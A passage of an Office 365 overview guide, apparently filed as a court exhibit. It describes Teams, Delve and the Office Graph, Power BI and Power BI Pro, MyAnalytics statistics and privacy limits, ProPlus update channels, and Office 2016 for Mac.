- In a one-on-one or group conversation, you can upload a file to your OneDrive for Business and share it or choose an existing OneDrive file. Everyone in the conversation will automatically be given permission to view, edit, and share the file.
- In a channel, you can choose to upload a file from your Microsoft Teams, Recent files, OneDrive for Business, or desktop. The entire team will be able to access the file instantly.

## Manage Microsoft Teams

Office 365 admins can enable and manage Microsoft Teams directly from the Office 365 admin center.

In the **Services & add-ins** page, admins will find a new **Microsoft Teams** section where they can enable the service for their organization, as it is disabled by default during the preview period. After enabling, admins can configure Microsoft Teams for their organization, including notifications, feedback, bots and screen sharing in meetings.





## Scenarios

Microsoft Teams is particularly well suited for teams where team members are highly engaged, iterating on shared deliverables. There are such scenarios across Sales, Marketing, Project Management, Engineering and Customer Service.

**Sales**

- Close deals faster: get answers to customer questions, advice on objections and approvals
- Spend more time selling: digitize status meetings, sales training and expert Q&A sessions
- Stay ahead of customers: know the latest company, product and competitor news
- Build a winning culture: share customer feedback and wins with valuable context
- Update the account team with customer feedback and implications for account management

**Marketing**

- Execute marketing campaigns and events flawlessly: coordinate tasks and deliverables, share updates across multiple stakeholders
- Manage the creative process from concept to launch: share designs, gather feedback and approvals
- Work closer with field marketers: keep the field in the loop, get their input and feedback
- Build a creative team culture: share ideas, inspiration and best practices

**Project Management**

- Collaborate engineering and development across a distributed team
- Streamline product launches and releases: coordinate tasks and deliverables, share status and updates
- Speed up issue resolution: spin up digital war rooms for escalations and track progress

**Engineering**

- Develop faster across distributed teams: enable continuous communication and smooth handoffs between teams
- Build a collaborative culture: discuss ideas and requirements, gather inputs and feedback in the open

**Customer Support**

- Enable continuous knowledge-sharing: share known issues and fixes between shifts
- Build a collective knowledge base: document customer FAQs and subject matter Q&A
- Speed up issue resolution: troubleshoot critical issues together in various subject matter experts
- Stay ahead of customers: know the latest product updates and customer offers

## Resources

**Watch**

- Introducing Microsoft Teams
- Onboard your teams

**For Users**

- Blog post: Introducing Microsoft Teams—the chat-based workspace in Office 365
- Microsoft Teams Help, FAQ
- Teams and Channels
- Meetings and Calling
- Managing My Space
- Managing Notifications and Staying Focused

**For Admins**

- Microsoft Teams Customer Success Kit
- MVA Course: Introducing Microsoft Teams (in Preview)
- Frequently asked questions about Microsoft Teams – Admin Help
- Microsoft Teams: Step-by-step intro for users, enabling and managing the experience
- Administrator settings for Microsoft Teams

# Delve

Delve helps you discover the information that's likely to be most interesting to you right now - across Office 365. Find information about people - and through people - and help others find you.

You don't have to remember the title of a document or where it's stored. Delve shows you documents no matter where they're stored in OneDrive for Business or SharePoint in Office 365.

Delve never changes any permissions, so you'll only see documents that you already have access to. Other people will not see your private documents. Learn more about privacy.

- Click someone's name or picture anywhere in Delve to see documents they're working on or to learn more about them.
- When you find a document you're interested in, add it as a favorite or to a board to easily get back to it later.
- Search for people, documents, or boards.



## Features

### View and edit your profile

The profile page in Delve makes it easy for you to update your profile information, and for others to find and connect with you. With the new profile page in Delve, you can also quickly get back to documents you've worked on recently, or go to other people's profile pages to see what they're up to.



You can go to your profile page by selecting **Me** from the left-hand menu. To change your information, choose **Edit profile.**



## Connect and collaborate

You and everyone else in your organization have your own profile page in Delve. Use the profile pages to find information **about** people - and **through** people - and to help others find you. You can also connect with others directly from their profile page.

On your own page, you can quickly **get back to documents** you've worked on recently, **go to other people's pages** to see what they're up to, and update your personal information.

To go to your profile page, click **Me** in the left pane, or click your name or picture anywhere in Delve.



**Get back to your recent documents**

This section shows documents you've recently authored or modified, and that are stored in OneDrive for Business or SharePoint. Click a document to open it, or click **See all** to see more documents.

**Click a person to see what they're working on**

In this section, you see some of the people you work with, or people you're connected to in the organization. Click a person to go to their profile page, or click **See all** to see more people.

**Discover documents from people around you**

This section shows a selection of popular documents from people around you. The selection of documents changes over time, and is based on what the people you work with have worked on or read. Click a document to open it, or click **See all** to see more documents.

If you find something you want to keep for later, add the document to your **favorites** or to a **board**.

## Group and share documents

In Delve, you can use **boards** to group and share related documents. You can, for example, create a board to collect all project documents for your team. Boards make it easy to collect and discover content, and they are easy to share with others, too.

You can also keep track of documents in Delve by adding them to your **Favorites**. If you find a document you want to save for later, click the icon in the lower left corner to add it to your favorites.

Boards are open to everyone in your organization, and you can see, add documents to, or remove documents from any board in Delve. If a board has documents that you don't have access to, those documents will not show up for you.



### Share a board with others

To send a link to a board through email, click **Send a link** at the top of the board. Type in the email address, change the message if you want, and send.

### Remove a document from a board

Click the board icon in the bottom left corner on a content card. In the dialog box that opens, click the **X** for the board you want to remove the card from.



### Keep track of your favorite documents

To add a document to your **Favorites**, click the icon in the lower left corner of the card.



### Share a document with others through email

To send a link to a document through email, click the three dots in the lower right corner on the content card and then **Send a link**. Type in the email address, change the message if you want, and send.



### Give other people access to your document

To share a document with others from within Delve, click the three dots in the lower right corner on the content card, then **Who can see this?**, and then click **Invite people**.



### Work with others on documents in Delve

When you open documents in **Office Online**, your colleagues can open them at the same time. That means you don't have to wait for someone to finish adding information to a document before you can enter yours.

As you see each other's updates you can discuss and share ideas, resulting in a document that's truly a team effort

### Work together on documents by using Yammer

You can post documents to Yammer from Delve. You can also talk about the document on Yammer, or view existing conversations.

## Find people and information

Discover new information on your **Home** page, get back to your own documents on your profile page (**Me**), and find information about other **people** on their profile pages. You can also find back to documents in **Favorites** or find documents through **boards**.

The **Get back to your recent documents** section shows the documents you've recently authored or modified, and that are stored in OneDrive for Business or in Sites.



### Find information about other people

You can find information about other people by going to their profile page in Delve. The **People** list on the left shows some of the people you've recently viewed in Delve. To find other people:

- Click a person's name or picture anywhere in Delve.
- Or, type their name in the search box, and then click their name.

**Keep track of your favorite documents and boards**

Whenever you see a document in Delve that you want to save for later, click the star to add it to your favorites.

**Find people and information by using search**

Start typing in the search box to find people, documents, or boards.



## Office Graph

The Office Graph lives in Office 365. It stores data *about* Office 365 entities and the relationships between them as nodes and edges in a graph index. Examples of entities are **person** and **document**; examples of relationships are **shared** and **modified**.



The Office Graph uses advanced analytics and machine learning techniques to connect and complete the data coming from all of the Office 365 services. To present the most relevant content in different contexts, the Office Graph uses a two-step analysis.

- calculates which users in the graph are most relevant to the current context.
- retrieves the most relevant content associated with these users.

The Office Graph continuously collects and analyses signals that you and your colleagues send when you work in Office 365. For example, when you and a colleague modify or view the same document, it's a signal that you're likely to be working together.

Other signals are who you communicate with through e-mail, and who you've shared documents with, who your manager is, and who has the same manager as you.



Delve uses the result of the Office Graph analysis to show you documents that are most likely to be relevant to you right now. For example, the Office Graph will notice if several of the people you regularly work with, view a specific document. That document is most likely also interesting to you, so Delve shows it on your **Home** page.

The Microsoft Graph API allows developers to discover and modify entities in the Office Graph. Like other Office 365 APIs, the Office Graph API will follow REST and OData 4.0 standards for data transport, and use the OAuth 2.0 standard for authentication and authorization.



Refer to the Office 365 Application Development section later in this document.

## Introduce Delve in your Organization

- SharePoint Online and OneDrive for Business are the primary sources of content in Delve. How you and users manage permissions on documents and sites affects what users see in Delve.
- You can download this email template to announce Delve in your organization.
- Let users know they can get Delve on their mobile phones, see Office Delve for Android or Office Delve for iPhone.
- You can point users to the Delve help articles. What is Office Delve? is a great starting point, and users may be particularly interested in the information in the articles - Are my documents safe in Office Delve?, What kind of information will I find in Office Delve? and Store your documents where Office Delve can get to them.

## Resources

**Watch Videos** ...

- Introducing Office Delve Mobile Apps for Android and iPhone
- The Office 365 Authoring Canvas inside Office Delve

**Read** ...

- What is Office Delve?
- What kind of information will I find in Office Delve?
- How does Office Delve know what's relevant to me?
- How to use the content cards in Delve
- View and edit your profile
- Connect and collaborate in Office Delve
- Group and share documents in Office Delve
- How can I find people and information in Office Delve?
- Are my documents safe in Office Delve?
- What decides the title on the card?

For Admins

- Office Delve for Office 365 admins
- What is the effect of allowing or not allowing access to the Office Graph?

## Power BI Pro

Power BI enables anyone and everyone to easily connect to any of their data, create live dashboards and reports, and explore data through interactive visualizations at any time. With Power BI, you can make all of your data viewable in a single location, regardless of where the data resides, enabling a consolidated view of business operations.

Power BI includes two companion applications:

- **Power BI Desktop**, a visual data exploration and reporting tool.
- **Mobile applications** for Windows, iOS, and Android devices, providing secure access to live Power BI dashboards and reports from any device.



In addition, Power BI can be extended with a set of REST APIs which enable developers to integrate client and web solutions with Power BI or to build custom visualizations.

> *Power BI ecosystem provides a unique set of features that empower everyone to benefit from direct access to the BI they need.*

## Power BI vs Power BI Pro

Power BI is a freemium offer that includes a free offer "Power BI" and a paid offer "Power BI Pro"

- **Power BI**: will enable anyone to get started quickly allowing them to create, view, and share personal dashboards and reports.
- **Power BI Pro**: will continue to offer the full range of Power BI capabilities ideal for corporate-wide use including extended data source support, enhanced data refresh options, and richer collaboration and sharing.

| Feature | Power BI | Power BI Pro |
|---|---|---|
| Data capacity limit | 1 GB/ user | 10 GB/ user |
| Create, view and share your personal dashboards and reports | ● | ● |
| Author content with the Power BI Desktop | ● | ● |
| Explore data with Natural Language | ● | ● |
| Access your dashboards on mobile devices using native apps | ● | ● |
| Consume curated content packs for services like Dynamics, Salesforce, and Google Analytics | ● | ● |
| Import data and reports from Excel, CSV and Power BI Desktop files | ● | ● |
| **Data Refresh** | | |
| Consume content that is scheduled to refresh | Daily | Hourly |
| Consume streaming data in your dashboards and reports | 10K rows/ hour | 1M rows/ hour |
| Consume live data sources with full interactivity | | ● |
| Access on-premises data using the Data Connectivity Gateways | | ● |
| **Collaboration** | | |
| Collaborate with your team using Office 365 Groups in Power BI | | ● |
| Create, publish and view organizational content packs | | ● |
| Manage access control and sharing through Active Directory groups | | ● |
| Shared data queries through the Data Catalog | | ● |

**Personal dashboards & reports** are created, updated, deleted & shared by a single individual. Recipients of shared content receive a read-only copy.

**Team dashboards & reports** allow one or more individuals to create, update, delete & share the content. Whether shared content is read-only or editable by recipients can be controlled by the sharer or by IT policy.

## Features

### Live dashboards



- Set of data visualizations, or charts, from one or more underlying reports.
- When a visualization in a dashboard is connected to a real-time data source, the visualization updates continuously, enabling faster insights.
- May contain visualizations from multiple reports.
- Highly customizable - you may add, or "pin", any chart from any report to any dashboard.

### Interactive reports

- Enables anyone to create rich, interactive reports. Reports are the foundation for dashboards.
- Report is a set of charts, also known as visualizations, based on the same underlying dataset
- To create reports that use data from multiple sources, use Power BI Desktop or Power Pivot for Excel with multiple sources, then upload the Power BI Desktop or Excel file to Power BI.
- Construct a report from scratch, select a pre-authored report (such as a report generated in Power BI Desktop), or apply a default report for a given dataset.
- Can be customized - for example, by modifying visualizations in an existing report, or adding new visualizations.
- Once a report contains the desired visualizations, pin the report, or a subset of its contents, to a dashboard for ease of viewing.
- Reports can also be shared with other individuals in an organization, and consumed on both desktop computers and mobile devices.

### Data visualizations



- Dashboards and reports are built using visualizations, or charts.
- Variety of visualization options are available, enabling you to present data in a compelling and visually appealing manner.
- Visualizations include: comparison charts (bar, line, basic area and waterfall charts), composition charts (treemaps, donut and pie charts), mixed comparison and composition charts (stacked charts), relationship charts (bubble charts), geographical charts, and gauges based on a percentage value.
- Use slicers to filter visualizations on the same report page so they display exactly what's needed.

### Mobile applications

- Supports live, secure dashboard access on any device through native, interactive apps for Windows, iOS, and Android.
- Dashboard user interface is optimized for smaller displays.
- Setting favorites makes it easier to access specific visualization tiles.
- Zoom in and out of visualizations to look at data more closely.
- Set up alerts, and receive a notification when data exceeds or drops below certain thresholds.
- Take a snapshot of a report or visualization, and make annotations using highlight features.
- Collaborate with others by sharing your annotated snapshot via SMS or email

### Natural Language Query



- Let's you ask questions of your data phrased in plain English, and produces answers in the form of new visualizations, or charts.
- Intelligently filters, sorts, aggregates, groups, and displays data based on key words in the question asked.
- Generates a chart to answer the question, using the data from the underlying reports.
- Pin the chart to the dashboard if desired, and modify it by asking more questions.
- Because a dashboard can contain charts from multiple datasets, your questions can involve data from any one of the datasets.

**Sharing with others**

- By default, all of the data and reports you create and upload are privately visible only to you.
- Dashboards can be easily shared with other users in your organization if needed
- Any subsequent changes to a shared dashboard automatically sync across all users - no manual updates required.
- To control access, you can specify whether another user can share that same dashboard with others.
- Dashboard and the underlying reports are shared in reading view.
- User who accesses the shared dashboard cannot create new reports or save changes to existing reports.
- Users of a shared dashboard cannot see or download a dataset that are used in the dashboard.
- Power BI groups offer a powerful collaborative experience built on Office 365 groups. Team of people can collaborate on dashboards and reports. The datasets for the dashboards and reports reside in the group's workspace. You can manage your group workspaces directly from within Power BI.

## Power BI data sources

Power BI integrates with a wide range of data sources, including both cloud and on-premises solutions. With a wide variety of data sources, you can quickly and easily connect to SaaS solutions, on-premises data living in SQL Server Analysis Services, Azure services, and Excel and Power BI Desktop files. Using REST APIs, you can even connect to custom data sources, such as proprietary corporate data or external data services.

**SaaS solutions**



- Users can connect directly to popular SaaS solutions.

- Power BI delivers a seamless user experience through solution-specific "content packs" and automatic data refresh.
- Content packs include pre-configured dashboards, reports, datasets, embedded queries, and metadata.
- Data is refreshed automatically, eliminating the need for time-consuming data provisioning.

**Organizational content packs**

- You can package up and share your own dashboard, reports, and datasets with your coworkers. For example, your finance team can use an organizational content pack to distribute finance data consistently and efficiently to executives across your organization.
- You can create the reports in Power BI and publish them as an organizational content pack to your team.
- Content packs are easy to find - they are all in one location, the content gallery.
- Organizational content packs can be used like the pre-defined content packs available for SaaS solutions, and offer a pre-packaged experience.

**On-premises data sources**

- The Analysis Services Connector functionality built into Power BI allows live queries to SSAS tabular models. There is no need to move data to the cloud or to schedule data refreshes - you can view live data in Power BI dashboards and reports. Communication between the connector and Power BI occurs through Azure Service Bus.
- With Power BI Desktop or Excel, business analysts can import data from a wide range of on-premises data sources and publish it to Power BI.

**Integration with Azure services**

- Power BI integrates with other Microsoft cloud services, including Azure SQL Database, Azure SQL Database Auditing, and Azure Stream Analytics.
- By extending existing Azure services capabilities into Power BI, you can build seamless, end-to-end BI solutions. For example, you can use Azure Stream Analytics to process streaming data, then push the data into Power BI, enabling real-time dashboard updates.

**Excel and Power BI Desktop files**



- Excel and Power BI Desktop files may be published directly to Power BI with a single click, where you can create dashboards and reports based on the data.

- When a file is uploaded, Power BI may automatically enhance the data by detecting key characteristics. For example, if a table in an uploaded Excel file includes a date field, Power BI may automatically create month and year columns to facilitate reporting based on those elements.
- Loading files from Power BI Desktop enables you to surface data from a variety of sources that do not directly connect to Power BI. For example, if you want to use Power BI to explore data from Facebook, a SharePoint list, or from your SAP system.

## Gateway for the on-premises data

With Power BI gateways, you can keep your data fresh by connecting to on-premises data sources. Query large data sets while leveraging your existing investments. The gateways provide the flexibility you need to meet individual needs, and the needs of your organization.

- **Power BI Gateway – Personal**: Refresh your on-premises data quickly without waiting for an IT Admin. Designed for use with personal data sets, there is no central monitoring capabilities for this gateway.
- **Power BI Gateway - Enterprise (preview)**: This gateway is used by organizations to serve a large number of users. It also enables administrators to set up access control for individual data sources and monitor usage.

## Important Terms

- A **dataset** is data uploaded into the Power BI service from an online or on-premises data source.
- A **data source** is where the data actually comes from. It can be just about anything; a database, Excel worksheet, Web service, etc.
- The **gateway** is different from a data source. The gateway is more of the proxy between on-premises and the cloud.
- **DirectQuery** always gets the latest data using the credentials that were setup for the Data Source by the Gateway Admin.

## Resources

- Power BI - Overview and Learning
- Power BI - basic concepts
- Get started with Power BI
- Propelling digital transformation in manufacturing operations with Power BI
- Get data for Power BI
- Power BI Blog
- Power BI Personal Gateway
- Power BI Gateway - Enterprise (Preview)
- Microsoft Power BI Desktop
- Microsoft Power BI Analysis Services Connector
- Download a Power BI app:
  - The iPad app (Power BI for iOS)
  - The iPhone app (Power BI for iOS)

- The Power BI app for Windows devices (not Windows phones)
- The Power BI app for Android phones

## MyAnalytics

The decisions that each individual employee in an organization makes each day add up to a tremendous impact on the success or failure of an organization. We know that our most scarce resource is time, and when we make decisions on how to use our time we are literally choosing where to spend the capital of our organization. Now with the power of big data, we have a massive opportunity to understand how organizations work, and to optimize processes, activities, and interactions for the highest impact.

By understanding the building blocks on how work gets done – communication and collaboration – MyAnalytics creates a source of innovation and competitive advantage for individuals and organizations. The power of this capability is when it is harnessed in the context of a business or strategic initiative and leadership is seeking to solve a particular business problem.

## Features

### Personal work analytics dashboards

- Monitor personal dashboards the vital stats of your work
- Understand where you are spending time
- Establish feedback loops and set targets and monitor benchmarks
- Receive recommendations for ways to get your time back and spend it more effectively

### Team analytics dashboards

Aggregated and anonymous data about teams of a certain size can help managers understand important aspects about the team is executing.

- Aggregated and anonymous data from your team
- Understand where time is going across your team
- Ensure your team is focused on the right activities for success

### Analytics Platform & APIs

Pursue industry or initiative specific analysis with the analytics platform and API component of the offer.

- Customize dashboards with additional data sources
- Support business initiatives with data driven analysis
- Target specific queries with customized analysis

## MyAnalytics Dashboard and Outlook add-in

MyAnalytics helps you understand how you collaborate with colleagues and spend your time at work. The dashboard gives you the tools you need to help you prioritize work and spend

Case 0:20-cv-60416-XXXX   Document 1-14   Entered on FLSD Docket 02/26/2020   Page 87 of 117

time more effectively. You can set weekly goals and measure your progress over time. The Outlook add-in gives you insight on how your colleagues respond to you in email.

Only you have access to your MyAnalytics dashboard and Outlook add-in. **MyAnalytics does not include any settings that provide your manager or anyone else in your organization access to your dashboard or add-in.**

**What data do the personal dashboard and the Outlook add-in use?**

MyAnalytics uses information from your Office 365 mailbox and calendar, such as how many emails you send and receive from different recipients, and meeting duration. However, we don't collect content from the email body or calendar descriptions.

**Can I opt out of MyAnalytics and the Outlook add-in?**

You can opt out of your data being used to calculate aggregate statistics for your organization. For example, if you opt out, your data will not be used to calculate statistics on the average time people in your organization spend in meetings, or the percentage of recipients who have read an email.

- If you opt out, you will no longer be able to access your personal dashboard or the Outlook add-in.
- You can opt back in any time. You'll get access to your personal dashboard and the Outlook add-in.

## How are statistics calculated?

**Meeting Hours**

| What you see | Shows how much time you spent in meetings. |
|---|---|
| Where the data comes from | Your data is collected from your Office 365 calendar. Company averages are based on aggregated data from other users in your organization. |
| How it's calculated | The statistics are based on meetings in your calendar that you've accepted, and where your status is set to **Busy**. The following meetings are *not included*:<br>• Meetings with no other participants than yourself, for example when you block time in your calendar or set reminders.<br>• All-day meetings.<br>• Meetings marked as **Private**.<br>• Meetings with more than 500 attendees. |

**Email Hours**

| What you see | An estimate of how much time you spent sending and reading emails. See how these compare to the company average and to your personal goals. |
|---|---|
| Where the data comes from | Your data is collected from your Office 365 mailbox. Company averages are based on aggregated data from other users in your organization. |
| How it's calculated | The main rules are: |

| | • For each email you write (send), we assign 5 minutes.<br>• For each email you read (open), we assign 2.5 minutes.<br>However, there are exceptions:<br>• If you send one email and then open or send another one within 5 minutes, we assign the time between the two actions to the first email.<br>• If you open an email and then open or send another one within 2.5 minutes, we assign the time difference between the two actions to the first email. |
|---|---|



- We register email across all devices, such as laptop or mobile phone.
- We only include emails where your name, or a group you're a member of, is on the To or Cc lines.
- We don't count emails you delete without opening.
- Email that you read or write outside the defined work hours are included in After hours.

**Focus Hours**

| What you see | Focus hours are defined as at least two consecutive hours of time without meetings. |
|---|---|
| Where the data comes from | Your data is collected from your Office 365 calendar. |
| How we calculate the numbers | • Sums up the total number of hours in your calendar where you have at least two consecutive hours without meetings.<br>• Only includes focus hours within your defined work hours.<br>• Sending or receiving emails during focus hours doesn't interfere with the focus hour calculation. |

**After Hours**

| What you see | Shows time spent on email and in meetings outside defined work hours, for example emails read or sent on weekends. |
|---|---|
| Where the data comes from | Your data is collected from your Office 365 calendar and mailbox. Company averages are based on aggregated data from other users in your organization. |
| How we calculate the numbers | See Meetings hours and Email hours tables above. |

## MyAnalytics Outlook add-in



The MyAnalytics Outlook add-in helps you understand the reach of your emails and your relationships with colleagues.

- For emails you **send**, the add-in shows the number of people who have read, forwarded, and replied, as well as a lifespan chart showing the email's read activity. You'll only see these statistics for emails you've sent to at least five people, and you can't identify who read or forwarded the email.
- For emails you **receive**, the add-in gives you information about your relationships with colleagues, including the number of emails you've exchanged, your average response times, and the percentage of their email you read. Only you have access to your personal relationship statistics.

### No statistics available - why?

**For privacy reasons**, you will not be able to identify individual people from the MyAnalytics Outlook add-in. This means that MyAnalytics does not display statistics for emails sent to fewer than five people or show that 100% of recipients read an email.

| Too few recipients | We only show statistics for emails that are sent to at least five people. |
|---|---|
| Too few qualified recipients | We only show statistics for emails that are sent to at least five people who are also *qualified* for statistics. Qualified people are people within your organization who use Office 365 and Outlook/OWA, and who are **not**:<br>• Opted out of **MyAnalytics**.<br>• Excluded from MyAnalytics (for example legal departments). |
| Too old | We don't show read statistics for emails that are older than seven days. |
| Too new | It takes some time to generate statistics for recent emails. |
| Low read activity | Fewer than two people have read the email. Check back later once more people have read the email. |
| 100% read your email | For privacy reasons, MyAnalytics does not provide an exact read rate when 100% (or close to 100%) of recipients read your email. The message will say: **Essentially everyone read your email.** |
| You opted out of MyAnalytics | If Delve isn't permitted to use your email and meeting information, you will not see any statistics. You can opt in through **Feature settings** in Delve. |

## How can these statistics help my work?

With insights about how effective your communication is, you can evaluate and make changes if necessary.

Check your read rate frequently to improve email effectiveness over time. For example, if a weekly digest email has low read rate, try these recommendations:

- Send it on a different day of the week to see if more people read it.
- Consider increasing the number of recipients or changing the recipient list.
- Try using different subject lines to engage your recipients or shorten the content to make it easier to read.
- Test new ways of broadcasting your message - maybe email isn't the best medium.

## MyAnalytics tips

These tips that can help you spend your time better and focus on what's important in your work. All tips aren't for everyone. What you can and should do always depends on your role and the organization you work in.

### Meetings

Fewer meetings, shorter meetings, or more focused meetings. These are some options if you want to save time spent in meetings.

- Send recaps instead of invitations
- Shorten your meetings
- Rethink recurring meetings
- Rethink the attendee list
- Discourage "business tourism"

### Email

Pick up the phone, don't "reply all", or unsubscribe from email lists that aren't useful, are some alternatives for what you can do if you see that you spend too much time on emails.

- Remove unnecessary email recipients
- Send fewer emails - use Skype or pick up the phone
- Unsubscribe from groups that you don't read
- Spare others' inboxes

### After hours

Be a thoughtful coworker!

- Condense emails and status updates with daily or weekly digests for "inform" type emails. This reduces the overall noise and randomization caused by email overload.
- Save drafts or delay delivery for email until the recipients' normal business hours. Limit late night/early morning email to urgent email to cut through the noise.
- Turn off notifications on your phone and desktop when you are trying to focus.

As a team:

- For example: No meetings Wednesdays
- Agreed upon "team hours"
- Be respectful of people's time
- Be intentional of meeting overruns and who you invite

## Focus time

We define focus time as at least two consecutive hours of time without meetings. Focus time is meant to represent enough time so you can focus on deliverables or complete other important tasks.

- Block focus time on your calendar
- Fewer meetings
- More time for fostering relationships can translate to higher levels of productivity
- Make time for what's important

## Resources

- Learn more about the way you work with MyAnalytics
- MyAnalytics Outlook add-in
- MyAnalytics Dashboard and Outlook add-in
- MyAnalytics Tips
- MyAnalytics for Office 365 admins

## Office 365 ProPlus (Office)

Office 365 ProPlus is the new Office, Office as a service. Office 365 ProPlus has the full set of application experiences you are used to, fully-customizable and available without a connection to the Internet but, it is licensed, deployed and updated as a service.

> *Full suite of rich productivity apps with the added value of a service.*

**Cloud** – The ubiquity of the cloud shifts us from a world of individual creation to real-time, anytime, anywhere, collaboration and collective creation.

- Office 365 ProPlus roams documents and settings across your devices - so your dictionary and theme settings, your recent documents, as well as the last page or slide you were working on go with you. So users can switch from device to device and maintain cohesive, productive experience.
- Connected people are productive people. Office 365 keeps people connected to one another, and to content and data. Office 365 ProPlus is the front-end to a productivity platform to share, collaborate and create wherever, whenever.
- Office 365 ProPlus is updated like a service, with frequent, non-disruptive updates, for faster value delivery to users

**Mobility** – The cloud powers our devices. We believe in a truly mobile world that revolves around us so that any device can become your device.

- As a user-based service, Office 365 ProPlus allows each person to install on multiple devices. Up to 5 PCs of Macs, 5 tablets and 5 smartphones.
- Per-user licensing provides business agility as your business grows and doesn't penalize you for living a device-rich lifestyle.

**Deployment** – Full control of your Office

- Streaming from the cloud, Office 365 ProPlus can be up and running in 2-3 minutes. But moving to Office 365 ProPlus does not mean that you have to give up control over software updates. You can still use your existing software management tools and processes.
- As a service, Office 365 ProPlus uses smaller, easily managed updates instead of large, complex upgrades.
- Office 365 ProPlus can help free up IT time and resources to focus on other value added products.

## Change Management for Office 365 Clients

Both Windows 10 and Office 365 have adopted the servicing model for client updates. This means that new features, non-security updates, and security updates are released regularly, so your users can have the latest functionality and improvements. The servicing model also includes time for enterprise organizations to test and validate releases before adopting them.

For the Office 2016 version of Office 365 ProPlus, Microsoft provides you three options, called update channels, to control how often Office 365 ProPlus is updated with new features. Here's an overview of the three options.

| Update channel | Primary purpose |
|---|---|
| Current Channel | Provide users with the newest features of Office as soon as they're available. |
| Deferred Channel | Provide users with new features of Office only a few times a year. |
| First Release for Deferred Channel | Provide pilot users and application compatibility testers the opportunity to test the next Deferred Channel. |

| Update channel | Feature updates | Security updates | Non-security updates |
|---|---|---|---|
| Current Channel | Monthly | Monthly | Monthly |
| Deferred Channel | Every four months | Monthly | Every four months |
| First Release for Deferred Channel | Every four months | Monthly | Monthly |

**What's in it for Enterprise Organizations?**

You want up-to-date features, but you also want the control and support you need to run your business. With the variety of release programs and branches for Windows 10 and Office 365,

you can evaluate new features, pilot them with specific groups in your organization, and then deploy them widely to your organization. You can also keep specialty systems on a long-term build for control. Use the update option that's right for your devices and your business needs.

**Focus on your business, not managing the software**

The following table explains ways you can focus on your business, not managing the software, with the Office 365 client applications

| Stay up to date | Regular updates mean your users' phones, tablets, and desktops stay up to date with the latest fixes. |
|---|---|
| Mix and match programs | Follow your business needs – not all systems need to follow the same deployment model. You can even use different models for Windows and Office on the same devices. |
| Save on management | Allow automatic updates to the fully tested Current Branch for Business (Windows) and Deferred Channel (Office 365) instead of managing the software packages yourself. |
| Stay in the loop | See what's coming in the next releases and find out what security updates have been included by reviewing communications from Microsoft. |
| Manage risk | Use Current Branch for Business (Windows) and Deferred Channel or First Release for Deferred Channel (Office 365) to test critical line-of-business applications that must remain up and running. |
| Save on development | First, check the marketplace – others may have a solution that works. If you need custom development, use best practices to ensure add-ins work after updates. |

**Security, always**: You'll always get the latest security updates, no waiting, whichever program you choose.

**Default Branches for Client Applications**

Office 365 includes different sets of client applications. Office 365 Business includes the core Office applications (Word, Excel, PowerPoint, Outlook, OneNote, and Publisher), and Office 365 ProPlus includes the core applications plus Skype for Business and Access. Project Online Desktop Client and Visio Pro for Office 365 also follow this release model.

By default, the client applications for Office 365 are set to these channel releases:

- **Office 365 Business, Project Online Desktop Client, and Visio Pro for Office 365** are set to use Current Channel.
- **Office 365 ProPlus** is set to use Deferred Channel

**Note**: Learn more about what's new for Office 365 subscribers this month at: Office 2016 | Office for Mac | Office Mobile for Windows | Office for iPhone and iPad | Office on Android.

## Resources

**Microsoft Virtual Academy courses**

- Office 365 ProPlus: What's New in 2016 and Beyond
- Office 365 ProPlus Deployment Deep Dive

**Watch Videos** …

- Office 2016 and the new servicing options for Office 365 admins demo
- Office 2016 setup and deployment updates demo
- Office 2016 security updates demo - DLP, MFA & sharing from Outlook
- Office 2016 real-time co-authoring and how it works demo

**Read** …

- What's new and improved in Office 2016 for Office 365
- Overview of Office 365 ProPlus
- Office 365 for business training
- Office 2016 Quick Start Guides and downloadable guides
- Collaborate on Word documents with real-time co-authoring
- Collaborate on PowerPoint presentations with co-authoring
- Getting started with Word 2016
- Getting started with Excel 2016
- Managing your email and calendar on the go with Outlook 2016

**For Admins** …

- New Office 365 ProPlus deployment guide for IT pros
- Determine the deployment method to use for Office 365 ProPlus
- Overview of update channels for Office 365 ProPlus
- Prepare to update Office 365 ProPlus to the Office 2016 version
- Change management for Office 365 clients. Model
- Updated Office 365 modern authentication public preview

## Office 2016 for Mac

Microsoft Office 2016 for Mac enables you to do your best work – anywhere, anytime and with anyone. New, modern versions of Word, Excel, PowerPoint, Outlook, and OneNote have the familiar look and feel of Office, and are thoughtfully designed for Mac.

**Unmistakably Office, designed for Mac**

Get started quickly with new, modern versions of Word, Excel, PowerPoint, Outlook and OneNote – combining the familiarity of Office and the unique Mac features you love.

- The redesigned **Ribbon menu** organizes features in a similar way as Office for Windows and iPad, so you can quickly find what you need.
- The new **task pane** interface makes complex tasks easy, like formatting images in Word, designing animations in PowerPoint, and inserting formulas in Excel.

- Office offers unequaled **file compatibility and layout fidelity**. Documents will look how you intended in Office on Mac, PC, tablet and phone.
- Your document's text and graphics are beautifully rendered and sharper than ever on your Mac's **Retina display**, and presentations look absolutely stunning.
- Navigate your documents, spreadsheets and presentations intuitively with familiar **Multi-Touch gestures**.

**Do your best work, anywhere, anytime**

The new Office for Mac is cloud-connected, so you can create great-looking documents, gain new insights, and present with confidence - anywhere, anytime.

- Access your files whenever you need to, thanks to **integration with OneDrive, OneDrive for Business and SharePoint**.
- With **roaming recent files**, you can quickly pick up from where you left off on any device.
- The new **Insights pane** in Word, powered by Bing, shows relevant contextual information from the Web within the reading and authoring experience.
- Excel takes the guesswork out of visualizing your data: it **recommends charts** best suited for your numbers, and lets you preview different options.
- **Presenter View** in PowerPoint gives you the tools to present with confidence – displaying the current slide, next slide, speaker notes and a timer on your Mac, while projecting only the presentation to your audience on the big screen.
- Outlook automatically organizes your inbox in **conversations**, without inadvertently including messages with the same subject that belong to a different conversation.

**Made for teamwork**

Get more done by working together using built-in tools to share, review and co-edit documents, presentations and notes.

- Easily **share your documents** and invite others to review or edit them.
- **Co-authoring** in Word and PowerPoint enables several people to work simultaneously in the same document from different devices in different locations.
- **Threaded comments** in Word and PowerPoint enable you to have useful conversations right next to relevant text. You can quickly see who replied to whom and when.
- The new **Conflict Resolution view** in PowerPoint lets you visually compare conflicting changes, so you can easily decide what version to keep.
- **Share a OneNote notebook** with friends, family or colleagues so everyone can add their notes and work together on travel plans, household tasks or work projects.

## Touch Bar support

Through the Touch Bar, Office intelligently puts the most common commands at your fingertips—all based on what you're doing in the document.

**Word**

From the Touch Bar you can enter **Word Focus Mode**, a brand-new experience that hides all of the on-screen ribbons and commands so you can simply focus on your work. One tap and you can quickly apply a new style to a heading or paragraph.

**PowerPoint**

